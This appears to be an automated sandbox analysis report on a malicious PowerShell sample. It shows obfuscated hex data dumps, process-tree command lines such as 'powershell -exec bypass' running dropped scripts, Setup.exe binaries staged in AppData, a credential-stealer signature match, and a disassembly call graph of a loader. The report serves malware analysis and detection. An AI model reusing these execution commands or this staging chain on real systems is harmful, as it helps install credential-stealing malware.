                                                                                                                                                                                                          2024-11-29 14:46:29 UTC1369INData Raw: 74 57 2e 79 6d 62 66 5f 49 2e 6a 4f 51 44 4d 2e 45 6c 6c 6b 5a 78 42 54 36 4f 78 73 56 7a 78 6c 5f 55 66 74 31 75 6d 42 79 4a 59 51 69 65 55 69 47 48 31 44 5f 64 48 72 33 57 79 4b 6d 48 65 4a 53 6c 69 79 72 30 4b 70 38 71 37 6e 55 6c 75 61 4c 61 4b 4c 69 43 77 42 74 7a 64 45 48 46 59 4f 78 52 47 65 4a 5a 38 51 44 4c 63 47 5f 31 30 58 46 4c 4c 6f 57 49 69 50 2e 78 4c 71 7a 35 2e 31 62 71 71 61 36 79 50 77 52 36 6f 57 48 64 37 56 42 66 4f 72 79 44 4a 66 31 5a 44 42 39 36 58 6d 68 6a 42 46 47 74 67 76 5a 4b 34 73 32 62 31 66 6e 2e 2e 58 77 54 33 46 4f 55 50 34 53 55 44 74 6a 52 52 41 6d 47 73 56 62 6f 71 44 70 58 32 78 69 55 56 48 76 44 36 48 31 68 53 6e 63 59 55 4d 48 2e 42 6a 62 79 30 71 67 64 43 47 7a 38 50 42 31 56 66 78 47 56 51 33 54 37 6f 43 35 79 31
                                                                                                                                                                                                          Data Ascii: tW.ymbf_I.jOQDM.EllkZxBT6OxsVzxl_Uft1umByJYQieUiGH1D_dHr3WyKmHeJSliyr0Kp8q7nUluaLaKLiCwBtzdEHFYOxRGeJZ8QDLcG_10XFLLoWIiP.xLqz5.1bqqa6yPwR6oWHd7VBfOryDJf1ZDB96XmhjBFGtgvZK4s2b1fn..XwT3FOUP4SUDtjRRAmGsVboqDpX2xiUVHvD6H1hSncYUMH.Bjby0qgdCGz8PB1VfxGVQ3T7oC5y1
                                                                                                                                                                                                          2024-11-29 14:46:29 UTC1369INData Raw: 37 75 79 6c 38 33 4b 77 53 53 4f 6f 6c 64 7a 6b 32 31 52 37 33 45 6f 77 59 34 76 4a 4c 76 77 50 43 47 54 77 72 75 6a 67 6e 63 4f 78 42 2e 71 30 70 69 68 6c 46 76 6a 46 62 68 44 32 6e 70 57 56 70 31 6a 4a 35 41 4d 71 37 32 72 58 69 73 56 52 47 56 2e 79 6c 69 79 76 33 48 79 43 4f 4f 58 50 31 37 44 51 66 31 56 75 67 77 67 61 6d 75 78 4d 45 56 56 63 6e 36 35 65 4c 72 5a 61 39 48 48 61 48 37 42 46 38 4e 35 70 6e 56 6f 59 53 68 41 4d 52 52 56 34 46 73 74 5a 70 68 53 52 6a 35 4e 4e 2e 2e 41 79 64 69 39 4d 51 65 6a 49 4b 4e 6c 68 56 63 74 79 50 6e 55 6e 6f 2e 34 64 6a 36 43 68 48 68 55 75 39 6e 76 57 57 76 5f 32 34 6f 72 31 36 45 43 6a 57 67 44 57 56 34 34 65 7a 4c 5a 69 76 68 4e 49 52 33 48 4d 65 67 43 6d 35 34 34 65 30 4b 6f 37 4e 6e 39 66 53 62 4c 6e 49 33 37
                                                                                                                                                                                                          Data Ascii: 7uyl83KwSSOoldzk21R73EowY4vJLvwPCGTwrujgncOxB.q0pihlFvjFbhD2npWVp1jJ5AMq72rXisVRGV.yliyv3HyCOOXP17DQf1VugwgamuxMEVVcn65eLrZa9HHaH7BF8N5pnVoYShAMRRV4FstZphSRj5NN..Aydi9MQejIKNlhVctyPnUno.4dj6ChHhUu9nvWWv_24or16ECjWgDWV44ezLZivhNIR3HMegCm544e0Ko7Nn9fSbLnI37
                                                                                                                                                                                                          2024-11-29 14:46:29 UTC1369INData Raw: 68 45 34 37 51 5f 6b 42 75 54 75 6b 53 67 6d 51 30 63 36 76 56 53 2e 49 32 6f 38 54 4d 46 35 67 76 39 44 68 4f 41 5a 61 39 46 77 47 76 73 72 44 4c 35 6d 55 34 4b 7a 69 64 4a 64 72 62 33 6f 41 47 48 6c 37 44 77 5f 6b 48 49 75 57 49 53 62 53 51 71 44 78 7a 73 32 34 4a 74 6f 2e 42 44 74 4f 39 6d 66 61 73 52 76 44 35 50 78 62 57 69 74 44 30 77 6f 44 77 57 33 63 37 33 31 6b 67 55 78 2e 70 75 76 37 53 33 61 45 57 67 32 74 34 71 47 2e 4a 4a 2e 63 55 5a 56 52 61 44 65 2e 52 58 4c 66 38 65 46 73 52 63 76 35 57 67 52 64 74 30 79 45 70 37 41 36 35 64 6d 79 5f 75 67 30 33 37 4c 78 41 61 58 58 55 59 31 49 66 72 33 6b 59 35 54 7a 77 77 44 56 36 67 4a 67 4e 71 51 5f 34 67 64 35 51 74 50 4a 57 48 32 74 6a 46 70 30 78 48 79 6b 68 57 38 54 77 6f 75 30 67 33 38 4d 4c 77 41
                                                                                                                                                                                                          Data Ascii: hE47Q_kBuTukSgmQ0c6vVS.I2o8TMF5gv9DhOAZa9FwGvsrDL5mU4KzidJdrb3oAGHl7Dw_kHIuWISbSQqDxzs24Jto.BDtO9mfasRvD5PxbWitD0woDwW3c731kgUx.puv7S3aEWg2t4qG.JJ.cUZVRaDe.RXLf8eFsRcv5WgRdt0yEp7A65dmy_ug037LxAaXXUY1Ifr3kY5TzwwDV6gJgNqQ_4gd5QtPJWH2tjFp0xHykhW8Twou0g38MLwA
                                                                                                                                                                                                          2024-11-29 14:46:29 UTC37INData Raw: 69 6c 64 28 63 70 6f 29 3b 7d 28 29 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                          Data Ascii: ild(cpo);}());</script></body></html>


                                                                                                                                                                                                          Statistics

                                                                                                                                                                                                          CPU Usage

                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                          Memory Usage

                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                          Behavior

                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                          System Behavior

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                          Start time:09:44:59
                                                                                                                                                                                                          Start date:29/11/2024
                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\bUAmCazc.ps1"
                                                                                                                                                                                                          Imagebase:0x7ff788560000
                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:1
                                                                                                                                                                                                          Start time:09:44:59
                                                                                                                                                                                                          Start date:29/11/2024
                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                                          Start time:09:45:18
                                                                                                                                                                                                          Start date:29/11/2024
                                                                                                                                                                                                          Path:C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe"
                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                          File size:29'152 bytes
                                                                                                                                                                                                          MD5 hash:B6F6C3C38568EE26F1AC70411A822405
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:6
                                                                                                                                                                                                          Start time:09:45:24
                                                                                                                                                                                                          Start date:29/11/2024
                                                                                                                                                                                                          Path:C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exe
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exe
                                                                                                                                                                                                          Imagebase:0x7ff764a10000
                                                                                                                                                                                                          File size:291'968 bytes
                                                                                                                                                                                                          MD5 hash:7FB44C5BCA4226D8AAB7398E836807A2
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:7
                                                                                                                                                                                                          Start time:09:45:24
                                                                                                                                                                                                          Start date:29/11/2024
                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\more.com
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\more.com
                                                                                                                                                                                                          Imagebase:0x520000
                                                                                                                                                                                                          File size:24'576 bytes
                                                                                                                                                                                                          MD5 hash:03805AE7E8CBC07840108F5C80CF4973
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:8
                                                                                                                                                                                                          Start time:09:45:24
                                                                                                                                                                                                          Start date:29/11/2024
                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:9
                                                                                                                                                                                                          Start time:09:45:38
                                                                                                                                                                                                          Start date:29/11/2024
                                                                                                                                                                                                          Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                                                                          Imagebase:0x7ff6fd560000
                                                                                                                                                                                                          File size:71'680 bytes
                                                                                                                                                                                                          MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:11
                                                                                                                                                                                                          Start time:09:45:39
                                                                                                                                                                                                          Start date:29/11/2024
                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                          Imagebase:0x4c0000
                                                                                                                                                                                                          File size:59'904 bytes
                                                                                                                                                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000003.2399976992.0000000003406000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:12
                                                                                                                                                                                                          Start time:09:45:46
                                                                                                                                                                                                          Start date:29/11/2024
                                                                                                                                                                                                          Path:C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe"
                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                          File size:29'152 bytes
                                                                                                                                                                                                          MD5 hash:B6F6C3C38568EE26F1AC70411A822405
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:14
                                                                                                                                                                                                          Start time:09:46:28
                                                                                                                                                                                                          Start date:29/11/2024
                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\B03VAGDV27AOWCK1I.ps1"
                                                                                                                                                                                                          Imagebase:0xe30000
                                                                                                                                                                                                          File size:433'152 bytes
                                                                                                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:15
                                                                                                                                                                                                          Start time:09:46:28
                                                                                                                                                                                                          Start date:29/11/2024
                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Disassembly

                                                                                                                                                                                                          Reset < >

                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                            Execution Coverage:6.8%
                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                            Signature Coverage:14.9%
                                                                                                                                                                                                            Total number of Nodes:329
                                                                                                                                                                                                            Total number of Limit Nodes:6
                                                                                                                                                                                                            execution_graph 1035 402b80 1037 402b8e __set_app_type _encode_pointer __p__fmode __p__commode 1035->1037 1038 402c2d _pre_c_init __RTC_Initialize 1037->1038 1039 402c47 1038->1039 1040 402c3b __setusermatherr 1038->1040 1045 402faa _controlfp_s 1039->1045 1040->1039 1043 402c55 _configthreadlocale 1044 402c5e 1043->1044 1046 402c4c 1045->1046 1047 402fc6 _invoke_watson 1045->1047 1046->1043 1046->1044 1047->1046 1073 401e60 1074 401e71 1073->1074 1075 401e8c GetModuleHandleA 1073->1075 1074->1075 1076 401e77 _stricmp 1074->1076 1076->1074 1077 401e97 1076->1077 1078 402360 1079 40237b GetProcAddress 1078->1079 1080 40236d 1078->1080 1080->1079 1081 402388 1080->1081 1082 402820 1083 40284b 1082->1083 1084 402852 1083->1084 1085 402520 39 API calls 1083->1085 1086 402865 1085->1086 1087 40286e 1086->1087 1088 402230 3 API calls 1086->1088 1089 40289b 1088->1089 1090 4022c0 7 API calls 1089->1090 1091 4028a8 1089->1091 1090->1091 1092 402720 1093 402729 1092->1093 1094 40272b 1092->1094 1095 40277e malloc 1094->1095 1098 402746 1094->1098 1096 4027a6 1095->1096 1097 40279b memcpy 1095->1097 1097->1096 1099 4010a0 1100 4010cf 1099->1100 1101 4010d6 1100->1101 1102 4010da MessageBoxA 1100->1102 1103 4010fa 1102->1103 754 4029a1 775 402f2c 754->775 756 4029ad GetStartupInfoA 757 4029db InterlockedCompareExchange 756->757 758 4029ed 757->758 759 4029e9 757->759 761 402a17 758->761 762 402a0d _amsg_exit 758->762 759->758 760 4029f4 Sleep 759->760 760->757 763 402a40 761->763 764 402a20 _initterm_e 761->764 762->763 765 402a6a 763->765 766 402a4f _initterm 763->766 764->763 768 402a3b __onexit 764->768 767 402a6e InterlockedExchange 765->767 770 402a76 __IsNonwritableInCurrentImage 765->770 766->765 767->770 769 402b05 _ismbblead 769->770 770->769 772 402b4a 770->772 773 402aef exit 770->773 776 401110 770->776 772->768 774 402b53 _cexit 772->774 773->770 774->768 775->756 781 401a40 776->781 778 40111a 780 401170 778->780 784 401b90 778->784 780->770 791 4018e0 781->791 783 401a4c 783->778 790 401ba2 784->790 785 401bf5 getenv 786 401c32 785->786 787 401c09 __iob_func 785->787 786->780 788 401c1d 787->788 788->786 789 401c24 __iob_func 788->789 789->786 790->785 842 401220 FindResourceA 791->842 793 4018eb 794 4018f2 793->794 814 4013e0 793->814 794->783 796 4018ff 796->794 797 401912 6 API calls 796->797 798 401944 getenv 796->798 797->798 799 401973 798->799 800 401958 getenv atoi 798->800 864 401660 799->864 800->799 802 4019ba 803 4019c4 802->803 804 4019d5 802->804 869 4016f0 803->869 874 4017d0 804->874 807 401a36 807->783 808 4019c9 808->807 809 4019e6 808->809 811 401a0b 808->811 882 401540 FindResourceA 809->882 810 401540 54 API calls 810->807 811->810 813 401a03 813->783 815 401400 FindResourceA 814->815 816 4013f7 814->816 818 401412 LoadResource LockResource 815->818 819 401455 815->819 909 401180 GetModuleFileNameA 816->909 917 401d60 818->917 903 401350 CreateFileA 819->903 821 4013fd 821->815 823 401464 825 4014a4 _snprintf 823->825 826 40146d strncmp 823->826 824 40142c 827 401500 824->827 828 401437 GetLastError 824->828 832 401d60 48 API calls 825->832 830 401485 826->830 831 401498 UnmapViewOfFile 826->831 827->796 927 401000 828->927 834 401d60 48 API calls 830->834 831->825 831->827 835 4014cf 832->835 833 401448 833->796 836 401493 834->836 835->827 837 4014d6 GetLastError 835->837 836->831 838 401000 7 API calls 837->838 839 4014e7 838->839 840 401000 7 API calls 839->840 841 4014f3 840->841 841->796 843 401245 842->843 844 40123f 842->844 846 401265 LoadResource 843->846 847 40124c GetLastError 843->847 845 401180 11 API calls 844->845 845->843 849 401271 GetLastError 846->849 850 40128a LockResource 846->850 848 401000 7 API calls 847->848 851 40125d 848->851 852 401000 7 API calls 849->852 853 4012b8 850->853 854 40129f GetLastError 850->854 851->793 857 401282 852->857 855 4012d2 853->855 856 4012e6 853->856 858 401000 7 API calls 854->858 859 401000 7 API calls 855->859 862 401308 _snprintf 856->862 863 40132e GetModuleFileNameA 856->863 857->793 860 4012b0 858->860 861 4012de 859->861 860->793 861->793 862->793 863->793 865 401670 864->865 865->865 866 4016cc 865->866 867 4016ac strncpy 865->867 868 4016d3 GetFullPathNameA 866->868 867->868 868->802 870 4016fe 869->870 870->870 871 401000 7 API calls 870->871 873 40175c 870->873 872 401752 871->872 872->808 873->808 873->873 875 4017d8 malloc 874->875 877 40180d 875->877 881 401822 875->881 878 401000 7 API calls 877->878 879 401819 878->879 879->808 880 4018c4 free 880->808 881->880 883 401560 LoadResource 882->883 884 4015ac _snprintf LoadLibraryA 882->884 887 401570 LockResource 883->887 888 401653 883->888 885 4015f7 884->885 886 4015dd GetProcAddress 884->886 891 401350 6 API calls 885->891 886->885 890 4015ed 886->890 889 402520 39 API calls 887->889 888->813 892 401582 889->892 890->813 893 401604 891->893 892->888 897 402230 3 API calls 892->897 893->888 894 40160f strncmp 893->894 895 401627 894->895 896 40162e strncmp 894->896 895->896 898 401640 896->898 899 40164c UnmapViewOfFile 896->899 900 401598 897->900 1030 401510 898->1030 899->888 900->884 900->888 904 401372 903->904 905 401377 GetFileSize CreateFileMappingA CloseHandle 903->905 904->823 906 4013a8 905->906 907 4013af MapViewOfFile CloseHandle 905->907 906->823 908 4013cc 907->908 908->823 910 401199 GetLastError 909->910 912 4011b0 909->912 911 401000 7 API calls 910->911 913 4011aa 911->913 912->912 914 4011e4 strrchr 912->914 915 4011c6 strncmp 912->915 913->821 914->821 915->914 918 401d7d 917->918 919 401d6e 917->919 941 402520 918->941 931 401cb0 919->931 922 401d78 922->824 923 401dbb 923->824 924 401d89 924->923 926 401dc3 OutputDebugStringA __iob_func fprintf 924->926 965 402230 924->965 926->923 928 40104e 927->928 929 40100e FormatMessageA strncpy LocalFree 927->929 930 401053 lstrlenA _snprintf GetFocus MessageBoxA 928->930 929->930 930->833 932 401cc1 GetModuleHandleA 931->932 934 401cfa 932->934 935 401ced LoadLibraryA 932->935 937 401d25 934->937 939 401d03 934->939 935->934 936 401d54 935->936 936->922 937->922 938 401d10 GetProcAddress 938->939 940 401d2e OutputDebugStringA __iob_func fprintf 938->940 939->937 939->938 940->936 942 40254c 941->942 943 40252d 941->943 945 402574 942->945 946 40255c SetLastError 942->946 943->942 944 402533 _stricmp 943->944 944->943 949 40256b 944->949 947 402592 VirtualAlloc 945->947 948 402582 SetLastError 945->948 946->924 950 4025d3 6 API calls 947->950 951 4025af VirtualAlloc 947->951 948->924 949->924 972 401f60 950->972 951->950 952 4025c3 SetLastError 951->952 952->924 954 402665 977 4023a0 954->977 956 4026b2 free 995 4022c0 956->995 957 402680 957->956 990 402010 957->990 962 4026cd 962->924 963 4026a7 963->956 963->962 964 40269d SetLastError 964->956 966 402243 965->966 967 402247 965->967 966->924 971 402290 967->971 1024 402190 967->1024 969 40226b 970 402272 bsearch 969->970 969->971 970->971 971->924 974 401f88 972->974 976 402005 972->976 973 401fc2 VirtualAlloc memcpy 973->974 974->973 975 401fa4 VirtualAlloc memset 974->975 974->976 975->974 976->954 978 4023c3 IsBadReadPtr 977->978 979 402507 977->979 980 4024ff 978->980 987 4023d9 978->987 979->957 980->957 982 402401 realloc 984 4024ef SetLastError 982->984 982->987 983 4024e7 983->957 984->957 985 4024b6 IsBadReadPtr 985->983 985->987 986 40249c GetProcAddress 986->987 987->982 987->983 987->985 987->986 988 4024df SetLastError 987->988 989 402230 malloc qsort bsearch 987->989 1005 401ea0 987->1005 988->983 989->987 991 4020c5 990->991 993 40202f 990->993 991->962 991->963 991->964 992 402052 VirtualFree 992->993 993->991 993->992 994 40209e VirtualProtect 993->994 994->993 996 40235a 995->996 1004 4022cd 995->1004 996->924 997 402327 998 40233c 997->998 999 40232e VirtualFree 997->999 1001 402343 free 998->1001 1002 402349 GetProcessHeap HeapFree 998->1002 999->998 1000 40231d free 1000->997 1001->1002 1002->996 1004->997 1004->1000 1014 401f20 1004->1014 1006 401eb1 1005->1006 1007 401ecc 1005->1007 1006->1007 1008 401eb7 _stricmp 1006->1008 1009 401f08 LoadLibraryA 1007->1009 1011 401ee6 1007->1011 1008->1006 1010 401eff 1008->1010 1009->987 1010->987 1012 402520 36 API calls 1011->1012 1013 401eed free 1012->1013 1013->987 1015 401f3b FreeLibrary 1014->1015 1016 401f2f 1014->1016 1015->1004 1016->1015 1017 401f44 1016->1017 1018 401f55 1017->1018 1022 401e20 free 1017->1022 1018->1004 1021 4022c0 6 API calls 1021->1018 1023 401e34 1022->1023 1023->1021 1025 402223 1024->1025 1026 40219f malloc 1024->1026 1025->969 1027 4021d7 1026->1027 1028 4021dc qsort 1026->1028 1027->969 1028->1025 1031 402520 39 API calls 1030->1031 1032 40151f 1031->1032 1033 401531 1032->1033 1034 402230 3 API calls 1032->1034 1033->899 1034->1033 1104 402c61 1107 402fd8 1104->1107 1106 402c66 1106->1106 1108 40300a GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 1107->1108 1109 402ffd 1107->1109 1110 403001 1108->1110 1109->1108 1109->1110 1110->1106 1048 402f85 _except_handler4_common 1111 4030a8 IsDebuggerPresent _crt_debugger_hook SetUnhandledExceptionFilter UnhandledExceptionFilter 1112 403192 _crt_debugger_hook 1111->1112 1113 40319a GetCurrentProcess TerminateProcess 1111->1113 1112->1113 1114 402c6b 1115 402ca7 1114->1115 1117 402c7d 1114->1117 1116 402ca2 ?terminate@ 1116->1115 1117->1115 1117->1116 1118 402cad SetUnhandledExceptionFilter 1119 402b2f 1120 402b43 _exit 1119->1120 1121 402b4a 1119->1121 1120->1121 1122 402b53 _cexit 1121->1122 1123 402b59 __onexit 1121->1123 1122->1123 1049 401a50 getenv 1050 401a8c 1049->1050 1051 401a62 __iob_func 1049->1051 1050->1050 1052 401a77 1051->1052 1052->1050 1053 401a7e __iob_func 1052->1053 1053->1050 1054 402150 _stricmp 1125 4026f0 malloc 1126 402701 1125->1126 1127 402703 memcpy 1125->1127 1055 402956 1060 402d67 1055->1060 1058 4029a0 1059 402998 _amsg_exit 1059->1058 1063 402cc2 1060->1063 1062 402960 __getmainargs 1062->1058 1062->1059 1070 402f2c 1063->1070 1065 402cce _decode_pointer 1066 402cf1 7 API calls 1065->1066 1067 402ce5 _onexit 1065->1067 1071 402d5e _unlock 1066->1071 1068 402d55 __onexit 1067->1068 1068->1062 1070->1065 1071->1068 1072 402b1b _XcptFilter

                                                                                                                                                                                                            Callgraph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            • Opacity -> Relevance
                                                                                                                                                                                                            • Disassembly available
                                                                                                                                                                                                            callgraph 0 Function_00401A40 16 Function_004018E0 0->16 1 Function_004027C0 3 Function_00401C40 1->3 49 Function_00401C90 1->49 2 Function_00401540 7 Function_00401350 2->7 43 Function_00401510 2->43 55 Function_00402520 2->55 70 Function_00402230 2->70 4 Function_004022C0 51 Function_00401F20 4->51 5 Function_00402CC2 15 Function_00402D5E 5->15 34 Function_00402F71 5->34 66 Function_00402F2C 5->66 6 Function_004020D0 8 Function_00402DD0 9 Function_004017D0 9->3 37 Function_00401000 9->37 10 Function_00401A50 11 Function_00402150 12 Function_00402FD5 13 Function_00402956 25 Function_00402D67 13->25 14 Function_00402FD8 16->2 16->3 16->9 17 Function_00401660 16->17 18 Function_004013E0 16->18 31 Function_004016F0 16->31 60 Function_00401220 16->60 18->7 19 Function_00401D60 18->19 18->37 38 Function_00401180 18->38 19->55 69 Function_00401CB0 19->69 19->70 20 Function_00402E60 20->8 45 Function_00402E10 20->45 21 Function_00401F60 22 Function_00401E60 23 Function_00402360 24 Function_00402C61 24->14 25->5 26 Function_00402B67 27 Function_00402C6B 28 Function_00402B6B 28->34 29 Function_00402EEB 30 Function_00401DF0 31->37 32 Function_00402170 33 Function_004026F0 35 Function_00402D7E 36 Function_00402EFF 38->37 39 Function_00402900 40 Function_00402B80 40->12 40->35 65 Function_00402FAA 40->65 41 Function_00402F85 42 Function_00403086 43->55 43->70 44 Function_00401110 44->0 47 Function_00401B90 44->47 61 Function_00402920 44->61 46 Function_00402010 47->3 58 Function_00401AA0 47->58 48 Function_00402190 50 Function_00402B1B 51->4 54 Function_00401E20 51->54 52 Function_004023A0 53 Function_00401EA0 52->53 52->70 53->55 55->4 55->6 55->21 55->30 55->46 55->52 56 Function_00402820 56->4 56->55 56->70 57 Function_00402720 57->3 58->3 59 Function_004010A0 60->37 60->38 62 Function_004029A1 62->20 62->34 62->44 62->66 63 Function_00402DA4 64 Function_004030A8 67 Function_00402CAD 68 Function_00402B2F 68->34 70->48

                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                            Function 00401CB0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67libraryloaderCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(00000001,?,004056A8,?,00401D78,?,00000000,004014CF,?,00000000), ref: 00401CE1
                                                                                                                                                                                                            • LoadLibraryA.KERNELBASE(00000000,?,004056A8,?,00401D78,?,00000000,004014CF,?,00000000), ref: 00401CEE
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00401D14
                                                                                                                                                                                                            • OutputDebugStringA.KERNEL32(undef symbol,?,004056A8,?,00401D78,?,00000000,004014CF,?,00000000), ref: 00401D33
                                                                                                                                                                                                            • __iob_func.MSVCR90 ref: 00401D41
                                                                                                                                                                                                            • fprintf.MSVCR90 ref: 00401D4B
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.1936332755.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
